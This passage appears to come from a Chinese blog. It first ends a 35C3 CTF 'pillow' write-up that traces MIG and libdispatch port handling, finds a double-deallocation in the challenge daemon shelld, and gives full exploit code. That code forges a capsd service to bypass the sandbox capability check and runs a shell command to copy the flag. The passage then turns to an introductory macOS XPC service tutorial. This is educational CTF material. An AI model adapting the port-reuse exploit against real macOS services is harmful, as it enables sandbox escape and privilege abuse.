    if ((InHeadP->msgh_id > 133703) || (InHeadP->msgh_id < 133700) ||
        ((routine = shelld_subsystem.routine[InHeadP->msgh_id - 133700].stub_routine) == 0)) {
        ((mig_reply_error_t *)OutHeadP)->NDR = NDR_record;
        ((mig_reply_error_t *)OutHeadP)->RetCode = MIG_BAD_ID;
        return FALSE;
    }
    // 最后调用该 MIG 接口处理例程
    (*routine) (InHeadP, OutHeadP);
    return TRUE;
}

需要注意的是，shell_server 在 MIG 功能正常的情况下，将会始终返回 TRUE。

同时我们也可以看到，返回给 client 的信息并非 COMPLEX。

注意给 OutHeadP 设置 msgh_bits 时没有指定 COMPLEX flag。

2) _Xregister_completion_listener

当 Client 需要调用 register_completion_listener 函数时，shelld_server 会对应的调用到该函数的 routine 函数，即 _Xregister_completion_listener。

/* Routine register_completion_listener */
mig_internal novalue _Xregister_completion_listener
    (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP)
{
[...]
    typedef struct {
        mach_msg_header_t Head;
        /* start of the kernel processed data */
        mach_msg_body_t msgh_body;
        mach_msg_port_descriptor_t listener;
        /* end of the kernel processed data */
        NDR_record_t NDR;
        mach_msg_type_number_t sessionOffset; /* MiG doesn't use it */
        mach_msg_type_number_t sessionCnt;
        char session[4096];
        mach_msg_max_trailer_t trailer;
    } Request __attribute__((unused));
[...]
    typedef __Request__register_completion_listener_t __Request;
    typedef __Reply__register_completion_listener_t Reply __attribute__((unused));


    Request *In0P = (Request *) InHeadP;
    Reply *OutP = (Reply *) OutHeadP;
    mach_msg_max_trailer_t *TrailerP;
[...]
    OutP->RetCode = register_completion_listener(In0P->Head.msgh_request_port, In0P->session, In0P->listener.name, TrailerP->msgh_audit);
    
[...]
}

可以看到，Client 传递 mach port 给 server 时，是通过 mach_msg_port_descriptor_t来传递的。并且在下面调用了最终服务器所实现的那个接口，并将返回值（KERN_* 类型）存入 RetCode 字段中。

以下是返回的 mach msg 结构体，可以看到这个字段是为数不多会向上层传递的值：

typedef struct {
    mach_msg_header_t Head;
    NDR_record_t NDR;
    kern_return_t RetCode;
} __Reply__unregister_completion_listener_t __attribute__((unused));

那么这个 RetCode 在哪里使用呢？换句话说 server 实现的接口所返回的 KERN_* 返回值，对 server 所接收到的 listener mach port 的生命周期有影响么？

还真有影响。

3) libdispatch

我们再来看看 libdispatch 是如何处理 client 传来的 mach message 的。

对于 shelld 来说，可以看到它指定 libdispatch 调用 dispatch_mig_server 函数来处理 mach message。

dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, service_port, 0, dispatch_get_main_queue());

dispatch_source_set_event_handler(source, ^{
    dispatch_mig_server(source, MAX_MSG_SIZE, shelld_server);
});

dispatch_resume(source);
dispatch_main();

那我们就来简单了解一下 dispatch_mig_server 这个函数，以下是该函数核心源代码，代码经过省略并添加大量说明文字：

libdispatch 源码可以到 apple opensource libdispatch src 获取。

mach_msg_return_t
dispatch_mig_server(dispatch_source_t ds, size_t maxmsgsz,
        dispatch_mig_callback_t callback)
{
    [...]
    uint32_t cnt = 1000; // do not stall out serial queues
    boolean_t demux_success;
    bool received = false;
    [...]

    tmp_options = options;
    // XXX FIXME -- change this to not starve out the target queue
    // 尝试  cnt 次从消息队列中读取数据的操作
    for (;;) {
        // 如果循环经历了 cnt 次，或者等待队列为空
        if (DISPATCH_QUEUE_IS_SUSPENDED(ds) || (--cnt == 0)) {
            // 则在接下来的函数执行过程中，不再接收 mach message
            options &= ~MACH_RCV_MSG;
            tmp_options &= ~MACH_RCV_MSG;
            // 如果此时没有需要发送的数据，即这次是要继续尝试接收 message ，则直接返回
            if (!(tmp_options & MACH_SEND_MSG)) {
                goto out;
            }
        }
        // 此时 mach_msg 可能会接收或发送消息。循环第一次为RCV，第二次为SEND+RCV，第三次为SEND+RCV,最后一次为RCV，以此类推。
        kr = mach_msg(&bufReply->Head, tmp_options, bufReply->Head.msgh_size,
                (mach_msg_size_t)rcv_size, (mach_port_t)dr->du_ident, 0, 0);
        // 重置临时设置
        tmp_options = options;
        // mach_msg 错误处理，这里无需关注
        if (unlikely(kr)) {
            [...]
            goto out;
        }
        // 如果接下来不再需要接收消息，则直接返回
        if (!(tmp_options & MACH_RCV_MSG)) {
            goto out;
        }

        [...]
        // 走到这里则说明这一轮的循环 接收了一个 mach message(有没有在接收的时候顺带发了个msg，这里不管)
        received = true;

        // bufRequest 和 bufReply 进行交换
        bufTemp = bufRequest;
        bufRequest = bufReply;
        bufReply = bufTemp;
        // 此时接收到的 Mach msg 位于 bufRequest

        [...]
        
        _voucher_replace(voucher_create_with_mach_msg(&bufRequest->Head));
        bufReply->Head = (mach_msg_header_t){ };
        // 将接收到的信息调用 callback 处理，这里的 callback 是其他程序为 dispatch_mig_server 函数指定的一个 MIG 处理例程
        // 在 shelld 中，这个 callback 为 shelld_server
        demux_success = callback(&bufRequest->Head, &bufReply->Head);

        // 如果传入的 MIG Message 的 msgh_id 错误，导致 callback 失败
        if (!demux_success) {
            // destroy the request - but not the reply port
            bufRequest->Head.msgh_remote_port = 0;
            mach_msg_destroy(&bufRequest->Head);
        // 如果 callback 成功，并且需要返回的信息并非复杂信息
        } else if (!(bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
            // if MACH_MSGH_BITS_COMPLEX is _not_ set, then bufReply->RetCode
            // is present
            // 如果调用 server 的接口失败，即该接口返回的值不为 KERN_SUCCESS
            if (unlikely(bufReply->RetCode)) {
                [...]

                // destroy the request - but not the reply port
                bufRequest->Head.msgh_remote_port = 0;
                // 将会析构掉发来的 mach message
                mach_msg_destroy(&bufRequest->Head);
            }
        }
        // 如果需要回复信息，则设置 SEND flag，一会将跳转至循环头部执行 mach_msg(RCV|SEND)
        if (bufReply->Head.msgh_remote_port) {
            tmp_options |= MACH_SEND_MSG;
            if (MACH_MSGH_BITS_REMOTE(bufReply->Head.msgh_bits) !=
                    MACH_MSG_TYPE_MOVE_SEND_ONCE) {
                tmp_options |= MACH_SEND_TIMEOUT;
            }
        }
    }
    [...]

    return kr;
}

注意到这个片段：

// 在 shelld 中，这个 callback 为 shelld_server
demux_success = callback(&bufRequest->Head, &bufReply->Head);

// 如果传入的 MIG Message 的 msgh_id 错误，导致 callback 失败
if (!demux_success) {
    [...]
// 如果 callback 成功，并且需要返回的信息并非复杂信息
} else if (!(bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
    // if MACH_MSGH_BITS_COMPLEX is _not_ set, then bufReply->RetCode
    // is present
    // 如果调用 server 的接口失败，即该接口返回的值不为 KERN_SUCCESS
    if (unlikely(bufReply->RetCode)) {
        [...]

        // destroy the request - but not the reply port
        bufRequest->Head.msgh_remote_port = 0;
        // 将会析构掉发来的 mach message
        mach_msg_destroy(&bufRequest->Head);
    }
}

其中， callback 为之前 shelld 所指定的 shelld_server，几乎不可能返回 FALSE，同时待回复的 mach message 不为 COMPLEX，因此接下来的第一个 if 判断将不成立，进入第二个 if 分支中。

在这个 if 分支中，dispatch_mig_server 将对调用结果 RetCode 进行判断：如果调用失败，则调用 mach_msg_destroy 将 Request message 析构。

而在 mach_msg_destroy 的 XNU 实现中，注意到它会析构掉所传入 mach msg 中的 MACH_MSG_PORT_DESCRIPTOR，而这里存放的是先前 client 传来的 listerner mach port：

void
mach_msg_destroy(mach_msg_header_t *msg)
{
    mach_msg_bits_t mbits = msg->msgh_bits;

    /*
     * The msgh_local_port field doesn't hold a port right.
     * The receive operation consumes the destination port right.
     */

    mach_msg_destroy_port(msg->msgh_remote_port, MACH_MSGH_BITS_REMOTE(mbits));
    mach_msg_destroy_port(msg->msgh_voucher_port, MACH_MSGH_BITS_VOUCHER(mbits));

    if (mbits & MACH_MSGH_BITS_COMPLEX) {
        mach_msg_base_t         *base;
        mach_msg_type_number_t  count, i;
        mach_msg_descriptor_t   *daddr;

        base = (mach_msg_base_t *) msg;
        count = base->body.msgh_descriptor_count;

        daddr = (mach_msg_descriptor_t *) (base + 1);
        for (i = 0; i < count; i++) {
            switch (daddr->type.type) {
                case MACH_MSG_PORT_DESCRIPTOR: {
                    // 如果传入的 mach msg 中 description 类型为 PORT，则调用 mach_msg_destroy_port 将其释放
                    mach_msg_port_descriptor_t *dsc;

                    /* 
                     * Destroy port rights carried in the message 
                     */
                    dsc = &daddr->port;
                    // 而 mach_msg_destroy_port 函数均会调用 mach_port_deallocate 释放该 port
                    mach_msg_destroy_port(dsc->name, dsc->disposition);
                    daddr = (mach_msg_descriptor_t *)(dsc + 1);
                    break;
                }
                [...]
            }
        }
    }
}

这意味着：若 Server 所实现接口不返回 KERN_SUCCESS 时，libdispatch 将自动释放 client 传给 server 的 listener (mach port)。

即：如果 MIG 调用返回成功代码，则意味着该方法获得了消息中包含的所有 mach port right 的所有权；如果 MIG 调用返回失败代码，则意味着该方法对消息中包含的 mach port right 不具有任何所有权，此时消息中包含的 mach port right 将会静默被 MIG 析构。

4) mach_msg_server*

除了 libdispatch 以外，其他用于 MIG 的 mach_msg_server 和 mach_msg_server_once 函数同样遵循该规则：

mach_msg_return_t
mach_msg_server(
    boolean_t (*demux)(mach_msg_header_t *, mach_msg_header_t *),
    mach_msg_size_t max_size,
    mach_port_t rcv_name,
    mach_msg_options_t options)
{
    [...]

    for (;;) {
        [...]

        // 获取发来的信息
        mr = mach_msg(&bufRequest->Head, MACH_RCV_MSG|MACH_RCV_VOUCHER|options,
                  0, request_size, rcv_name,
                  MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

        while (mr == MACH_MSG_SUCCESS) {
            /* we have another request message */

            buffers_swapped = FALSE;
            old_state = voucher_mach_msg_adopt(&bufRequest->Head);

            // 调用 MIG server 
            (void) (*demux)(&bufRequest->Head, &bufReply->Head);
            
            // 如果返回的 mach msg 不为 COMPLEX
            if (!(bufReply->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
                if (bufReply->RetCode == MIG_NO_REPLY)
                    bufReply->Head.msgh_remote_port = MACH_PORT_NULL;
                // 并且 MIG 调用存在错误，同时 Client 传来的消息是 COMPLEX
                else if ((bufReply->RetCode != KERN_SUCCESS) &&
                     (bufRequest->Head.msgh_bits & MACH_MSGH_BITS_COMPLEX)) {
                    /* destroy the request - but not the reply port */
                    bufRequest->Head.msgh_remote_port = MACH_PORT_NULL;
                    // 调用 mach_msg_destroy 将其析构
                    mach_msg_destroy(&bufRequest->Head);
                }
            }

            [...]

        } /* while (mr == MACH_MSG_SUCCESS) */

        [...]

        break;

    } /* for(;;) */

    (void)vm_deallocate(self,
                (vm_address_t) bufRequest,
                request_alloc);
    (void)vm_deallocate(self,
                (vm_address_t) bufReply,
                reply_alloc);
    return mr;
}

c. 存在的问题

那么现在回到 register_completion_listern 函数中，我们再来看看哪里不对劲：

kern_return_t register_completion_listener(mach_port_t server, const char* session_name, mach_port_t listener, audit_token_t client) {
    CFMutableDictionaryRef session = lookup_session(session_name, client);
    if (!session) {
        mach_port_deallocate(mach_task_self(), listener);
        return KERN_FAILURE;
    }

    CFNumberRef value = CFNumberCreate(kCFAllocatorDefault, kCFNumberSInt32Type, &listener);
    CFDictionaryAddValue(session, CFSTR("listener"), value);
    CFRelease(value);

    return KERN_SUCCESS;
}

很明显，既然该函数要在查询不到 session 时返回 KERN_FAILUE，那么就不应该对 listerner 这个 mach port 进行 deallocation 操作，这将使得该 mach port 被 deallocate 两次，一次是该函数中，另一次是在 MIG 其他处理过程中。

d. 接管 capsd_service_port

根据上面的内容我们可以了解到，register_completion_listener 函数可能会导致对某个 mach port 的 double deallocation。

而又因为 mach port 是引用计数的，因此我们可以将 capsd_service_port 传给该函数，利用该函数的漏洞点，尝试二次释放掉 capsd_service_port。因为此时的 capsd_service_port 的引用计数为 2，二次释放将使得该 mach port 的引用计数归 0，导致该 mach port name 在当前 task 中被彻底释放。这样，该 mach port name 可被下一次创建的 mach port 所重用。

shelld 中， capsd_service_port 的引用计数在执行 register_completion_listener(..., capsd_service_port) 时，之所以为 2，是因为：
shelld 在 main 函数中执行 bootstrap_look_up，已经获取了一次 capsd_service_port 的 right
执行 register_completion_listener 时，client 将再发送一次 capsd_service_port 给 server
故 server 将在两个不同的地方持有相同的 port，引用计数为2。

因此，我们便可以尝试劫持/接管这个被释放掉的 mach port name，对 shelld 伪造一个 “capsd”，在 shelld 进行权限查询时返回错误结果，绕过 sandbox capability check。

花了点时间写了下利用，以下代码成功突破 shelld 的 sandbox capabilities check：

#include 
#include 

#include "../mig/shelld.h"
#include "../common/utils.h"
#include "../common/decls.h"

// 伪造 capsd 必备函数
boolean_t capsd_server
    (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP);

kern_return_t grant_capability(mach_port_t server, audit_token_t token, pid_t target, const char* op, const char* arg) {
    return KERN_SUCCESS;
}

kern_return_t has_capability(mach_port_t server, pid_t pid, const char* op, const char* arg, int* out) {
    *out = 1;
    return KERN_SUCCESS;
}

int main(int argc, char* argv[]) {
    // 获取 bootstrap port、 shelld port 和 capsd port
    mach_port_t bp, sp, cp;
    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bp);
    kern_return_t kr = bootstrap_look_up(bp, "net.saelo.shelld", &sp);
    ASSERT_SUCCESS(kr, "shelld bootstrap_look_up");
    kr = bootstrap_look_up(bp, "net.saelo.capsd", &cp);
    ASSERT_SUCCESS(kr, "capsd bootstrap_look_up");

    // 先提前准备好一个可用的 session
    shelld_create_session(sp, "session");

    // 简单测试一下，肯定无法通过 capability 检测，因为 exp 没有 /bin/bash 的启动权限
    kr = shell_exec(sp, "session", "echo 'Hello World'");
    if(kr != KERN_SUCCESS)
        printf("[*] shell_exec faild before attack.\n");

    // 尝试将 shelld 中的 capsd_service_port 释放
    register_completion_listener(sp, "non-exist-session", cp);

    // 创建一对新的 listener 和 listener_send_right
    mach_port_t listener, listener_send_right;
    mach_msg_type_name_t aquired_right;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &listener);
    mach_port_extract_right(mach_task_self(), listener, MACH_MSG_TYPE_MAKE_SEND, &listener_send_right, &aquired_right);

    /* 启动一个 伪capsd_server 
       需要注意的是，这里必须创建新的 dispatch queue 给 listener，
       因为 main queue 需要调用 dispatch_main 才能使用，但我们仍然需要使用控制流，因此不能调用 dispatch_main */
    dispatch_queue_main_t replyQueue = dispatch_queue_create("replyQueue", NULL);
    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, 0, replyQueue);
    dispatch_source_set_event_handler(source, ^{
        dispatch_mig_server(source, MAX_MSG_SIZE, capsd_server);
    });
    dispatch_resume(source);

    // 尝试绕过 sandbox capabilities check
    for(size_t cnt = 0; cnt < 10000; ++cnt) {
        register_completion_listener(sp, "session", listener_send_right);
        // 测试基本功能
        kr = shell_exec(sp, "session", "echo 'Hello World'");
        if(kr == KERN_SUCCESS) {
            printf("[+] shell_exec success! test %zu times.\n", cnt);
            break;
        }
        // 如果无法使用，则将该 listener 从 shelld 中删除
        unregister_completion_listener(sp, "session");
    }

    exit(EXIT_FAILURE);
}

运行效果如下，可以看到成功通过 capabilities check：

需要注意的是，调试时，最好每次都重启一下 shelld，防止其内部旧数据影响调试。

五、漏洞利用

综合上面的内容，我们最终可以拼接出一个完整 exploit：

#include 
#include 

#include "../mig/shelld.h"
#include "../common/utils.h"
#include "../common/decls.h"

// 伪造 capsd 必备函数
boolean_t capsd_server
    (mach_msg_header_t *InHeadP, mach_msg_header_t *OutHeadP);

kern_return_t grant_capability(mach_port_t server, audit_token_t token, pid_t target, const char* op, const char* arg) {
    return KERN_SUCCESS;
}

kern_return_t has_capability(mach_port_t server, pid_t pid, const char* op, const char* arg, int* out) {
    *out = 1;
    return KERN_SUCCESS;
}

int main(int argc, char* argv[]) {
    // 获取 bootstrap port、 shelld port 和 capsd port
    mach_port_t bp, sp, cp;
    task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bp);
    kern_return_t kr = bootstrap_look_up(bp, "net.saelo.shelld", &sp);
    ASSERT_SUCCESS(kr, "shelld bootstrap_look_up");
    kr = bootstrap_look_up(bp, "net.saelo.capsd", &cp);
    ASSERT_SUCCESS(kr, "capsd bootstrap_look_up");

    // 先提前准备好一个可用的 session
    char long_session_name[4096];
    memset(long_session_name, 'a', sizeof(long_session_name) - 1);
    long_session_name[sizeof(long_session_name) -1] = 0;
    shelld_create_session(sp, long_session_name);

    // 尝试将 shelld 中的 capsd_service_port 释放
    register_completion_listener(sp, "non-exist-session", cp);

    // 创建一对新的 listener 和 listener_send_right
    mach_port_t listener, listener_send_right;
    mach_msg_type_name_t aquired_right;
    mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &listener);
    mach_port_extract_right(mach_task_self(), listener, MACH_MSG_TYPE_MAKE_SEND, &listener_send_right, &aquired_right);

    /* 启动一个 伪capsd_server 
       需要注意的是，这里必须创建新的 dispatch queue 给 listener，
       因为 main queue 需要调用 dispatch_main 才能使用，但我们仍然需要使用控制流，因此不能调用 dispatch_main */
    dispatch_queue_main_t replyQueue = dispatch_queue_create("replyQueue", NULL);
    dispatch_source_t source = dispatch_source_create(DISPATCH_SOURCE_TYPE_MACH_RECV, listener, 0, replyQueue);
    dispatch_source_set_event_handler(source, ^{
        dispatch_mig_server(source, MAX_MSG_SIZE, capsd_server);
    });
    dispatch_resume(source);

    // 尝试绕过 sandbox capabilities check
    for(size_t cnt = 0; cnt < 10000; ++cnt) {
        register_completion_listener(sp, long_session_name, listener_send_right);
        // 测试基本功能
        const char *payload = 
            "chmod 777 /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag "
            "&& cp /Users/kiprey/Desktop/CTF/35c3ctf/pillow/flag /tmp/pillow_flag "
            "&& open -a TextEdit /tmp/pillow_flag";
        kr = shell_exec(sp, long_session_name, payload);
        if(kr == KERN_SUCCESS) {
            printf("[+] shell_exec success! test %zu times.\n", cnt);

            exit(EXIT_SUCCESS);
        }
        // 如果无法使用，则将该 listener 从 shelld 中删除
        unregister_completion_listener(sp, long_session_name);
    }

    exit(EXIT_FAILURE);
}

编译参数：

1
2
3

CC = clang
myexploit: myexploit.c
    $(CC) -g -O0 myexploit.c ../mig/shelldUser.c ../mig/capsdServer.c  -o myexploit

在沙箱中执行 exploit：

1
2
3

#!/bin/bash
make
sandbox-exec -f exploit.sb -D EXPLOIT_BIN=/Users/kiprey/Desktop/CTF/35c3ctf/pillow/exploit/myexploit ./myexploit

运行结果：

调试 exp 时，最好每次在执行 exp 前都重启一下 shelld。

六、参考链接

MacOSX XPC 入门

2022-01-03T16:00:00.000Z

一、简介

XPC 是一种 OS X 进程间通信技术，通过权限分离机制来对应用沙箱机制做了一个补充。其中，权限分离是根据每个部分所需的系统资源访问将应用程序分成多个部分，每个部分可以使用提前声明的权限（沙箱）。这种单个组件称为XPC 服务。
将应用程序分成多个部分，还可以提高程序的可靠性，防止程序的部分代码崩溃导致整个程序的退出。
每个 XPC 服务都位于自己的沙箱，即 XPC 服务有自己的容器和一组权限。包含在应用程序中 XPC 服务只能由应用程序自己访问。当应用程序启动时，系统会自动将它找到的每个 XPC 服务注册到应用程序可见的命名空间中。之后应用程序便可以与 XPC 服务通信并执行请求。
XPC 服务的特点：权限分离 + 错误隔离
XPC 服务有 launchd 所管理，当 XPC 服务被意外终止（或者崩溃）后，该服务将会被 launchd 重启。

二、XPC Service 使用入门

由于网上的例子中 Object-C 的例子较多，而 C 语言的 XPC 例子较少，因此这里也用 Object-C 学习 XPC。
虽然还没学 Object-C 还不大会…

1. 创建项目

打开 XCode，新建项目，选择 XPC Service。

之后输入 Product Name 和 Organization Identifier，最后的 Bundle Identifier 将会生成一个反向 DNS 名称格式的字符串。这个 Bundle ID 有大用，最好设置成应用程序的 subdomain（子域名），不过这里先忽略。

之后，XCode 将会存放一个 XPC 的示例代码，功能类似于 echo server。

接下来我们将慢慢研究这个示例代码，并顺带学习一下 Objective-c。

要是对 Objective-C 不太熟就对着这个看 Objective-C 基础知识 - 菜鸟教程

2. Service 简单示例

a. protocol

在使用 XPC 前，必须先声明一个接口(interface)。接口主要有协议(Protocol)组成，描述了应该在远程进程中调用哪些方法。

以下是 XCode 自生成的 protocol 声明。这里声明了一个名为 XPCDemoProtocol 的协议，同时还定义了一个 upperCaseString 的接口函数：

protocol 个人感觉有点类似于 C++ 中的虚类，不实现任何函数，只是简单的定义函数接口。

// XPCDemoProtocol.h

#import 

// The protocol that this service will vend as its API. This header file will also need to be visible to the process hosting the service.
@protocol XPCDemoProtocol

// Replace the API of this protocol with an API appropriate to the service you are vending.
- (void)upperCaseString:(NSString *)aString withReply:(void (^)(NSString *))reply;
    
@end

protocol 主要用于限制调用程序和 XPC 服务之间的编程接口。所有需要在调用程序中调用的方法必须在 protocol 中指定。需要注意的是：XPC 通信是异步的，因此 protocol 中的方法的返回值都只能是 void，如果需要返回数据则使用返回块，即正如上面代码中 upperCaseString 函数的第二个参数，类似于 callback。（什么是块？）

b. interface

在声明完 protocol 后，我们需要实现一个描述它的接口。因此这里的代码声明了 XPCDemo 类，继承自该 protocol：

//  XPCDemo.h

#import 
#import "XPCDemoProtocol.h"

// This object implements the protocol which we have defined. It provides the actual behavior for the service. It is 'exported' by the service to make it available to the process hosting the service over an NSXPCConnection.
@interface XPCDemo : NSObject 
@end

并实现类功能：

//  XPCDemo.m

#import "XPCDemo.h"

@implementation XPCDemo

// This implements the example protocol. Replace the body of this class with the implementation of this service's protocol.
- (void)upperCaseString:(NSString *)aString withReply:(void (^)(NSString *))reply {
    NSString *response = [aString uppercaseString];
    reply(response);
}

@end

上面的代码主要做了两件事情：

定义一个 protocol，即远程进程可以调用的函数接口
创建一个继承自该 protocol 的类，并实现这些函数接口。

这里的 upperCaseString 函数只做了一件事情：将传入的字符串全部转换为大写，并调用 callback 将结果返回。

c. NSXPCListener

看上去还挺好理解，那就继续看看 main 文件。

int main(int argc, const char *argv[])
{
    // Create the delegate for the service.
    ServiceDelegate *delegate = [ServiceDelegate new];
    
    // Set up the one NSXPCListener for this service. It will handle all incoming connections.
    NSXPCListener *listener = [NSXPCListener serviceListener];
    listener.delegate = delegate;
    
    // Resuming the serviceListener starts this service. This method does not return.
    [listener resume];
    return 0;
}

main 函数中创建了一个 NSXPCListener 类，并设置 listener 的委托，之后执行 resume 函数。

看上去有点不明觉厉，找了下 NSXPCListener 的类声明：

// Each NSXPCListener instance has a private serial queue. This queue is used when sending the delegate messages.
API_AVAILABLE(macos(10.8), ios(6.0), watchos(2.0), tvos(9.0))
@interface NSXPCListener : NSObject

// If your listener is an XPCService (that is, in the XPCServices folder of an application or framework), then use this method to get the shared, singleton NSXPCListener object that will await new connections. When the resume method is called on this listener, it will not return. Instead it hands over control to the object and allows it to service the listener as appropriate. This makes it ideal for use in your main() function. For more info on XPCServices, please refer to the developer documentation.
+ (NSXPCListener *)serviceListener;

[...]

// The delegate for the connection listener. If no delegate is set, all new connections will be rejected. See the protocol for more information on how to implement it.
@property (nullable, weak) id  delegate;

[...]

// All listeners start suspended and must be resumed before they will process incoming requests. If called on the serviceListener, this method will never return. Call it as the last step inside your main function in your XPC service after setting up desired initial state and the listener itself. If called on any other NSXPCListener, the connection is resumed and the method returns immediately.
- (void)resume;

// Suspend the listener. Suspends must be balanced with resumes before the listener may be invalidated.
- (void)suspend;

// Invalidate the listener. No more connections will be created. Once a listener is invalidated it may not be resumed or suspended.
- (void)invalidate;

@end

可以看到，

对于 XPCService 而言，serviceListener 属性是 XPCService 用于监听 XPC connection 的监听器。
当有新 XPC 连接到来时，连接将通过所设置的 delegate 进行处理。
在 XPC Service 初始执行并完成一系列初始化步骤后，调用 listener 的 resume 方法以开始提供 XPC 服务，该方法将不会返回。

d. NSXPCListenerDelegate

main 函数现在理解的差不多了，现在研究一下 NSXPCListenerDelegate，以下是它的协议声明：

@protocol NSXPCListenerDelegate 
@optional
// Accept or reject a new connection to the listener. This is a good time to set up properties on the new connection, like its exported object and interfaces. If a value of NO is returned, the connection object will be invalidated after this method returns. Be sure to resume the new connection and return YES when you are finished configuring it and are ready to receive messages. You may delay resuming the connection if you wish, but still return YES from this method if you want the connection to be accepted.
- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection;

@end

该协议中声明了一个可选实现的 listener 接口。这个接口的参数分别为：

listener：NSXPCListener 类型*，
newConnection：NSXPCConnection 类型*，新传入的连接

返回值是 BOOL 类型，可选值为 YES 和 NO。

Objective-C 还有两种布尔类型，分别是 bool (true, false) 和 Boolean (TRUE, FALSE)。

该函数用于为新连接设置属性时所执行的函数，类似于预处理。该函数可以选择接收或者拒绝传入的连接，并且还可以自由选择什么时候恢复连接。我们再来看看该函数默认生成所执行的操作：

//  main.m

#import 
#import "XPCDemo.h"

@interface ServiceDelegate : NSObject 
@end

@implementation ServiceDelegate

- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection {
    // This method is where the NSXPCListener configures, accepts, and resumes a new incoming NSXPCConnection.
    
    // Configure the connection.
    // First, set the interface that the exported object implements.
    newConnection.exportedInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCDemoProtocol)];
    
    // Next, set the object that the connection exports. All messages sent on the connection to this service will be sent to the exported object to handle. The connection retains the exported object.
    XPCDemo *exportedObject = [XPCDemo new];
    newConnection.exportedObject = exportedObject;
    
    // Resuming the connection allows the system to deliver more incoming messages.
    [newConnection resume];
    
    // Returning YES from this method tells the system that you have accepted this connection. If you want to reject the connection for some reason, call -invalidate on the connection and return NO.
    return YES;
}

@end

该函数将会为每个新连接设置其 exportedInterface 与 exportedObject ，并恢复该连接，换句话说，该函数会在处理连接之前设置传入连接的两个成员。

至于这种设置是为了什么，我们需要再看看 NSXPCConnection 类的声明，以下是截取出的部分声明：

// This object is the main configuration mechanism for the communication between two processes. Each NSXPCConnection instance has a private serial queue. This queue is used when sending messages to reply handlers, interruption handlers, and invalidation handlers.
API_AVAILABLE(macos(10.8), ios(6.0), watchos(2.0), tvos(9.0))
@interface NSXPCConnection : NSObject 

[...]

// The interface that describes messages that are allowed to be received by the exported object on this connection. This value is required if a exported object is set.
@property (nullable, retain) NSXPCInterface *exportedInterface;

// Set an exported object for the connection. Messages sent to the remoteObjectProxy from the other side of the connection will be dispatched to this object. Messages delivered to exported objects are serialized and sent on a non-main queue. The receiver is responsible for handling the messages on a different queue or thread if it is required.
@property (nullable, retain) id exportedObject;

[...]

// All connections start suspended. You must resume them before they will start processing received messages or sending messages through the remoteObjectProxy. Note: Calling resume does not immediately launch the XPC service. The service will be started on demand when the first message is sent. However, if the name specified when creating the connection is determined to be invalid, your invalidation handler will be called immediately (and asynchronously) after calling resume.
- (void)resume;

[...]

@end

也就是说该函数实际是为每个新连接指定了处理连接的方法：

exportedInterface：用于描述应向连接的另一端提供的方法。
exportedObject：包含一个本地对象，用于处理来自连接另一端的方法调用

当应用程序调用 NSXPCConnection 上代理的方法时，应用程序的 NSXPCCoonnection 将调用存储在 exportedObject 类上的目标方法，即实现远程进程调用。

e. Info.plist

Info.plist 在 XPC Service 中承担着较为重要的一部分。XPC Service 要求在 Info.plist 中指定一些特殊的键值对，以下是其中的一些类型：

CFBundleIdentifier：指定当前 XPC Service 的反向 DNS 样式的服务名称字符串。应用程序将通过这串 BundleID 来访问 XPC 服务。
还记得创建 XPC 服务项目时指定的 Bundle ID 么 :)
CFBundlePackageType：一个指定 Bundle Package 类型的字符串，XPC Service 中必须是 XPC!
XPCService：一个字典
- EnvironmentVariables：字典类型，用于指定 XPC 服务运行时的环境变量。
- JoinExistingSession：布尔值，表示 XPC 服务是否与调用方在同一个安全会话中运行。
- RunLoopType：字符串，用于指定服务的 runloop 类型，默认是 dispatch_main；还有一种是 NSRunLoop。

3. Client 简单示例

现在我们已经可以让 XPC Service 跑起来了，现在需要编写一个程序来使用 XPC Service。XPC Service 默认模板中提供了如下的 client 代码，它将发送一串字符给 XPC service 并将返回的结果输出：

创建 XPC 连接：

1
2
3

NSXPCConnection *_connectionToService = [[NSXPCConnection alloc] initWithServiceName:@"io.kiprey.github.XPCDemo"];
_connectionToService.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCDemoProtocol)];
[_connectionToService resume];

发送请求

[[_connectionToService remoteObjectProxy] upperCaseString:@"hello" withReply:^(NSString *aString) {
    // We have received a response. Update our text field, but do it on the main thread.
    NSLog(@"Result string was: %@", aString);
}];

在不需要连接时再来断开连接
1
[_connectionToService invalidate];

正如代码所示，

Client 会使用 XPC Service 中的 Bundle ID 来查找并与 XPC Service 建立连接。
之后 Client 指定了 remoteObjectInterface 属性，以规范调用接口的类型。
接下来，恢复 XPC 连接，并通过 NSXPCConnection 对象中的 remoteObjectProxy 属性，间接且透明的调用 XPC Service 上的接口。当XPC Service 完成服务后，返回的信息会被异步输出至控制台。
最后，关闭 XPC 连接。

4. 启动 XPC Service & Client

需要特别说明一下如何使用 XPC Service，并让 Client 成功连接上（这个绕了我半天）。

a. 局部 XPC Service

即，将 XPC Service 内嵌进 App 中。

首先，建立一个 App：

坑点：不能是 Command Line Tool 。
因为 Command Line Tool 不具有类似 App 的结构，因此无法托管 XPC Service。

之后，在接下来这个界面中选一个 Language 为 Objective-C 的 Interface，Interface 是 GUI 相关的暂时不用管：

项目创建后，选择 File -> New -> Target，新建一个 XPC Service。注意到在新建的最后一步中会有一个 Embed in Application选项：

这样，这个新建的 XPC Service 就会被内置进这个 Application 中：

之后，为了简单，我们直接将 main.m 中的原始代码：

#import 

int main(int argc, const char * argv[]) {
    
    @autoreleasepool {
        // Setup code that might create autoreleased objects goes here.
    }
    return NSApplicationMain(argc, argv);
}

